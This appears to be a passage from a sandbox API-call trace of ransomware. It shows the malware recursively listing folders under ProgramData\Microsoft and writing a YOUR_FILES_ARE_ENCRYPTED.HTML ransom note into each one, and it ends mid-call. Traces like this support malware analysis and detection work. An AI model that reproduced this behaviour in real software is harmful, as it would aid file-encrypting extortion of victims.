[0107.322] wnsprintfW (in: pszDest=0x6dd4e0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 80 [0107.322] GetProcessHeap () returned 0x600000 [0107.322] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x6ee9d8 [0107.322] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\programdata\\microsoft\\user account pictures\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x304 [0107.323] WriteFile (in: hFile=0x304, lpBuffer=0x6ee9d8*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19f0e0, lpOverlapped=0x0 | out: lpBuffer=0x6ee9d8*, lpNumberOfBytesWritten=0x19f0e0*=0x3c00, lpOverlapped=0x0) returned 1 [0107.323] CloseHandle (hObject=0x304) returned 1 [0107.324] GetProcessHeap () returned 0x600000 [0107.324] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x6ee9d8 | out: hHeap=0x600000) returned 1 [0107.324] GetProcessHeap () returned 0x600000 [0107.324] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x6dd4e0 | out: hHeap=0x600000) returned 1 [0107.325] FindNextFileW (in: hFindFile=0x626bb8, lpFindFileData=0x19f128 | out: lpFindFileData=0x19f128*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xd2c3a2, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x448c3dac, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x448c3dac, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x620890, dwReserved1=0x19f200, cFileName="Vault", cAlternateFileName="")) returned 1 [0107.325] StrStrIW (lpFirst="Vault", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0107.325] wnsprintfW (in: pszDest=0x671348, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Vault") returned 34 [0107.325] GetProcessHeap () returned 0x600000 [0107.325] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x6dd4e0 [0107.326] lstrcpyW (in: lpString1=0x6dd4e0, lpString2="\\\\?\\C:\\ProgramData\\Microsoft\\Vault" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\Vault") returned="\\\\?\\C:\\ProgramData\\Microsoft\\Vault" [0107.326] lstrcatW (in: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\Vault", lpString2="\\*" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\Vault\\*") returned="\\\\?\\C:\\ProgramData\\Microsoft\\Vault\\*" [0107.326] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Vault\\*", lpFindFileData=0x19ee14 | out: lpFindFileData=0x19ee14*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xd2c3a2, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x448c3dac, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x448c3dac, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x633802, dwReserved1=0x6337c8, cFileName=".", cAlternateFileName="")) returned 0x626cf8 [0107.326] FindNextFileW (in: hFindFile=0x626cf8, lpFindFileData=0x19ee14 | out: lpFindFileData=0x19ee14*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xd2c3a2, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x448c3dac, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x448c3dac, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x633802, dwReserved1=0x6337c8, cFileName="..", cAlternateFileName="")) returned 1 [0107.326] FindNextFileW (in: hFindFile=0x626cf8, lpFindFileData=0x19ee14 | out: lpFindFileData=0x19ee14*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x448c3dac, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x448c3dac, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x448c3dac, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x633802, dwReserved1=0x6337c8, cFileName="AC658CB4-9126-49BD-B877-31EEDAB3F204", cAlternateFileName="AC658C~1")) returned 1 [0107.326] StrStrIW (lpFirst="AC658CB4-9126-49BD-B877-31EEDAB3F204", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0107.326] wnsprintfW (in: pszDest=0x6dd4e0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Vault\\AC658CB4-9126-49BD-B877-31EEDAB3F204") returned 71 [0107.326] GetProcessHeap () returned 0x600000 [0107.326] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x682358 [0107.327] lstrcpyW (in: lpString1=0x682358, lpString2="\\\\?\\C:\\ProgramData\\Microsoft\\Vault\\AC658CB4-9126-49BD-B877-31EEDAB3F204" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\Vault\\AC658CB4-9126-49BD-B877-31EEDAB3F204") returned="\\\\?\\C:\\ProgramData\\Microsoft\\Vault\\AC658CB4-9126-49BD-B877-31EEDAB3F204" [0107.327] lstrcatW (in: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\Vault\\AC658CB4-9126-49BD-B877-31EEDAB3F204", lpString2="\\*" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\Vault\\AC658CB4-9126-49BD-B877-31EEDAB3F204\\*") returned="\\\\?\\C:\\ProgramData\\Microsoft\\Vault\\AC658CB4-9126-49BD-B877-31EEDAB3F204\\*" [0107.327] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Vault\\AC658CB4-9126-49BD-B877-31EEDAB3F204\\*", lpFindFileData=0x19eb00 | out: lpFindFileData=0x19eb00*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x448c3dac, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x448c3dac, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x448c3dac, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x628f60, dwReserved1=0x2297b0b, cFileName=".", cAlternateFileName="")) returned 0x626a38 [0107.328] FindNextFileW (in: hFindFile=0x626a38, lpFindFileData=0x19eb00 | out: lpFindFileData=0x19eb00*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x448c3dac, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x448c3dac, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x448c3dac, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x628f60, dwReserved1=0x2297b0b, cFileName="..", cAlternateFileName="")) returned 1 [0107.328] FindNextFileW (in: hFindFile=0x626a38, lpFindFileData=0x19eb00 | out: lpFindFileData=0x19eb00*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x448c3dac, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x448c3dac, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x448c3dac, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x9e, dwReserved0=0x628f60, dwReserved1=0x2297b0b, cFileName="154E23D0-C644-4E6F-8CE6-5069272F999F.vsch", cAlternateFileName="154E23~1.VSC")) returned 1 [0107.328] StrStrIW (lpFirst="154E23D0-C644-4E6F-8CE6-5069272F999F.vsch", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0107.328] wnsprintfW (in: pszDest=0x682358, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Vault\\AC658CB4-9126-49BD-B877-31EEDAB3F204\\154E23D0-C644-4E6F-8CE6-5069272F999F.vsch") returned 113 [0107.328] PathFindExtensionW (pszPath="154E23D0-C644-4E6F-8CE6-5069272F999F.vsch") returned=".vsch" [0107.328] lstrlenW (lpString=".vsch") returned 5 [0107.328] PathFindExtensionW (pszPath="154E23D0-C644-4E6F-8CE6-5069272F999F.vsch") returned=".vsch" [0107.328] FindNextFileW (in: hFindFile=0x626a38, lpFindFileData=0x19eb00 | out: lpFindFileData=0x19eb00*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x448c3dac, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x448c3dac, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x448c3dac, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x6e, dwReserved0=0x628f60, dwReserved1=0x2297b0b, cFileName="2F1A6504-0641-44CF-8BB5-3612D865F2E5.vsch", cAlternateFileName="2F1A65~1.VSC")) returned 1 [0107.328] StrStrIW (lpFirst="2F1A6504-0641-44CF-8BB5-3612D865F2E5.vsch", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0107.328] wnsprintfW (in: pszDest=0x682358, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Vault\\AC658CB4-9126-49BD-B877-31EEDAB3F204\\2F1A6504-0641-44CF-8BB5-3612D865F2E5.vsch") returned 113 [0107.328] PathFindExtensionW (pszPath="2F1A6504-0641-44CF-8BB5-3612D865F2E5.vsch") returned=".vsch" [0107.328] lstrlenW (lpString=".vsch") returned 5 [0107.328] PathFindExtensionW (pszPath="2F1A6504-0641-44CF-8BB5-3612D865F2E5.vsch") returned=".vsch" [0107.328] FindNextFileW (in: hFindFile=0x626a38, lpFindFileData=0x19eb00 | out: lpFindFileData=0x19eb00*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x448c3dac, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x448c3dac, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x448c3dac, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x106, dwReserved0=0x628f60, dwReserved1=0x2297b0b, cFileName="3CCD5499-87A8-4B10-A215-608888DD3B55.vsch", cAlternateFileName="3CCD54~1.VSC")) returned 1 [0107.328] StrStrIW (lpFirst="3CCD5499-87A8-4B10-A215-608888DD3B55.vsch", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0107.328] wnsprintfW (in: pszDest=0x682358, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Vault\\AC658CB4-9126-49BD-B877-31EEDAB3F204\\3CCD5499-87A8-4B10-A215-608888DD3B55.vsch") returned 113 [0107.328] PathFindExtensionW (pszPath="3CCD5499-87A8-4B10-A215-608888DD3B55.vsch") returned=".vsch" [0107.328] lstrlenW (lpString=".vsch") returned 5 [0107.329] PathFindExtensionW (pszPath="3CCD5499-87A8-4B10-A215-608888DD3B55.vsch") returned=".vsch" [0107.329] FindNextFileW (in: hFindFile=0x626a38, lpFindFileData=0x19eb00 | out: lpFindFileData=0x19eb00*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x448c3dac, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x448c3dac, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x448c3dac, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x1bc, dwReserved0=0x628f60, dwReserved1=0x2297b0b, cFileName="Policy.vpol", cAlternateFileName="POLICY~1.VPO")) returned 1 [0107.329] StrStrIW (lpFirst="Policy.vpol", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0107.329] wnsprintfW (in: pszDest=0x682358, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Vault\\AC658CB4-9126-49BD-B877-31EEDAB3F204\\Policy.vpol") returned 83 [0107.329] PathFindExtensionW (pszPath="Policy.vpol") returned=".vpol" [0107.329] lstrlenW (lpString=".vpol") returned 5 [0107.329] PathFindExtensionW (pszPath="Policy.vpol") returned=".vpol" [0107.329] FindNextFileW (in: hFindFile=0x626a38, lpFindFileData=0x19eb00 | out: lpFindFileData=0x19eb00*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x448c3dac, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x448c3dac, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x448c3dac, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x1bc, dwReserved0=0x628f60, dwReserved1=0x2297b0b, cFileName="Policy.vpol", cAlternateFileName="POLICY~1.VPO")) returned 0 [0107.329] FindClose (in: hFindFile=0x626a38 | out: hFindFile=0x626a38) returned 1 [0107.329] wnsprintfW (in: pszDest=0x682358, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Vault\\AC658CB4-9126-49BD-B877-31EEDAB3F204\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 101 [0107.329] GetProcessHeap () returned 0x600000 [0107.329] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x6ee9d8 [0107.329] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Vault\\AC658CB4-9126-49BD-B877-31EEDAB3F204\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\programdata\\microsoft\\vault\\ac658cb4-9126-49bd-b877-31eedab3f204\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x31c [0107.330] WriteFile (in: hFile=0x31c, lpBuffer=0x6ee9d8*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19edcc, lpOverlapped=0x0 | out: lpBuffer=0x6ee9d8*, lpNumberOfBytesWritten=0x19edcc*=0x3c00, lpOverlapped=0x0) returned 1 [0107.331] CloseHandle (hObject=0x31c) returned 1 [0107.331] GetProcessHeap () returned 0x600000 [0107.331] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x6ee9d8 | out: hHeap=0x600000) returned 1 [0107.331] GetProcessHeap () returned 0x600000 [0107.331] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x682358 | out: hHeap=0x600000) returned 1 [0107.332] FindNextFileW (in: hFindFile=0x626cf8, lpFindFileData=0x19ee14 | out: lpFindFileData=0x19ee14*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x448c3dac, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x448c3dac, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x448c3dac, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x633802, dwReserved1=0x6337c8, cFileName="AC658CB4-9126-49BD-B877-31EEDAB3F204", cAlternateFileName="AC658C~1")) returned 0 [0107.332] FindClose (in: hFindFile=0x626cf8 | out: hFindFile=0x626cf8) returned 1 [0107.332] wnsprintfW (in: pszDest=0x6dd4e0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Vault\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 64 [0107.332] GetProcessHeap () returned 0x600000 [0107.332] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x6ee9d8 [0107.333] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Vault\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\programdata\\microsoft\\vault\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x304 [0107.333] WriteFile (in: hFile=0x304, lpBuffer=0x6ee9d8*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19f0e0, lpOverlapped=0x0 | out: lpBuffer=0x6ee9d8*, lpNumberOfBytesWritten=0x19f0e0*=0x3c00, lpOverlapped=0x0) returned 1 [0107.334] CloseHandle (hObject=0x304) returned 1 [0107.334] GetProcessHeap () returned 0x600000 [0107.334] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x6ee9d8 | out: hHeap=0x600000) returned 1 [0107.334] GetProcessHeap () returned 0x600000 [0107.334] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x6dd4e0 | out: hHeap=0x600000) returned 1 [0107.335] FindNextFileW (in: hFindFile=0x626bb8, lpFindFileData=0x19f128 | out: lpFindFileData=0x19f128*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xd2c3a2, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xd2c3a2, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xd2c3a2, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x620890, dwReserved1=0x19f200, cFileName="WDF", cAlternateFileName="")) returned 1 [0107.335] StrStrIW (lpFirst="WDF", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0107.335] wnsprintfW (in: pszDest=0x671348, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\WDF") returned 32 [0107.335] GetProcessHeap () returned 0x600000 [0107.335] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x6dd4e0 [0107.336] lstrcpyW (in: lpString1=0x6dd4e0, lpString2="\\\\?\\C:\\ProgramData\\Microsoft\\WDF" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\WDF") returned="\\\\?\\C:\\ProgramData\\Microsoft\\WDF" [0107.336] lstrcatW (in: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\WDF", lpString2="\\*" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\WDF\\*") returned="\\\\?\\C:\\ProgramData\\Microsoft\\WDF\\*" [0107.336] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\WDF\\*", lpFindFileData=0x19ee14 | out: lpFindFileData=0x19ee14*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xd2c3a2, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xd2c3a2, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xd2c3a2, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x633802, dwReserved1=0x6337c8, cFileName=".", cAlternateFileName="")) returned 0x626838 [0107.336] FindNextFileW (in: hFindFile=0x626838, lpFindFileData=0x19ee14 | out: lpFindFileData=0x19ee14*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xd2c3a2, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xd2c3a2, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xd2c3a2, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x633802, dwReserved1=0x6337c8, cFileName="..", cAlternateFileName="")) returned 1 [0107.336] FindNextFileW (in: hFindFile=0x626838, lpFindFileData=0x19ee14 | out: lpFindFileData=0x19ee14*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xd2c3a2, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xd2c3a2, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xd2c3a2, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x633802, dwReserved1=0x6337c8, cFileName="..", cAlternateFileName="")) returned 0 [0107.336] FindClose (in: hFindFile=0x626838 | out: hFindFile=0x626838) returned 1 [0107.337] wnsprintfW (in: pszDest=0x6dd4e0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\WDF\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 62 [0107.337] GetProcessHeap () returned 0x600000 [0107.337] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x6ee9d8 [0107.337] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\WDF\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\programdata\\microsoft\\wdf\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x304 [0107.338] WriteFile (in: hFile=0x304, lpBuffer=0x6ee9d8*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19f0e0, lpOverlapped=0x0 | out: lpBuffer=0x6ee9d8*, lpNumberOfBytesWritten=0x19f0e0*=0x3c00, lpOverlapped=0x0) returned 1 [0107.338] CloseHandle (hObject=0x304) returned 1 [0107.339] GetProcessHeap () returned 0x600000 [0107.339] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x6ee9d8 | out: hHeap=0x600000) returned 1 [0107.339] GetProcessHeap () returned 0x600000 [0107.339] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x6dd4e0 | out: hHeap=0x600000) returned 1 [0107.341] FindNextFileW (in: hFindFile=0x626bb8, lpFindFileData=0x19f128 | out: lpFindFileData=0x19f128*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xd2c3a2, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x77d1fe08, ftLastAccessTime.dwHighDateTime=0x1d705ed, ftLastWriteTime.dwLowDateTime=0x77d1fe08, ftLastWriteTime.dwHighDateTime=0x1d705ed, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x620890, dwReserved1=0x19f200, cFileName="Windows", cAlternateFileName="")) returned 1 [0107.341] FindNextFileW (in: hFindFile=0x626bb8, lpFindFileData=0x19f128 | out: lpFindFileData=0x19f128*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xd525f5, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x35c3f417, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x35c3f417, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x620890, dwReserved1=0x19f200, cFileName="Windows Defender", cAlternateFileName="WINDOW~1")) returned 1 [0107.341] StrStrIW (lpFirst="Windows Defender", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0107.341] wnsprintfW (in: pszDest=0x671348, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender") returned 45 [0107.341] GetProcessHeap () returned 0x600000 [0107.341] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x6dd4e0 [0107.344] lstrcpyW (in: lpString1=0x6dd4e0, lpString2="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender") returned="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender" [0107.344] lstrcatW (in: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender", lpString2="\\*" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\*") returned="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\*" [0107.344] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\*", lpFindFileData=0x19ee14 | out: lpFindFileData=0x19ee14*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xd525f5, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x35c3f417, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x6520aed4, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x633802, dwReserved1=0x6337c8, cFileName=".", cAlternateFileName="")) returned 0x6266b8 [0107.345] FindNextFileW (in: hFindFile=0x6266b8, lpFindFileData=0x19ee14 | out: lpFindFileData=0x19ee14*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xd525f5, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x35c3f417, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x6520aed4, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x633802, dwReserved1=0x6337c8, cFileName="..", cAlternateFileName="")) returned 1 [0107.345] FindNextFileW (in: hFindFile=0x6266b8, lpFindFileData=0x19ee14 | out: lpFindFileData=0x19ee14*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xd525f5, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xd525f5, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xd525f5, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x633802, dwReserved1=0x6337c8, cFileName="Clean Store", cAlternateFileName="CLEANS~1")) returned 1 [0107.345] StrStrIW (lpFirst="Clean Store", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0107.345] wnsprintfW (in: pszDest=0x6dd4e0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Clean Store") returned 57 [0107.345] GetProcessHeap () returned 0x600000 [0107.345] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x682358 [0107.346] lstrcpyW (in: lpString1=0x682358, lpString2="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Clean Store" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Clean Store") returned="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Clean Store" [0107.346] lstrcatW (in: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Clean Store", lpString2="\\*" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Clean Store\\*") returned="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Clean Store\\*" [0107.346] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Clean Store\\*", lpFindFileData=0x19eb00 | out: lpFindFileData=0x19eb00*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xd525f5, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xd525f5, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xd525f5, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x63c210, dwReserved1=0x2297b0b, cFileName=".", cAlternateFileName="")) returned 0x6266f8 [0107.347] FindNextFileW (in: hFindFile=0x6266f8, lpFindFileData=0x19eb00 | out: lpFindFileData=0x19eb00*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xd525f5, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xd525f5, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xd525f5, 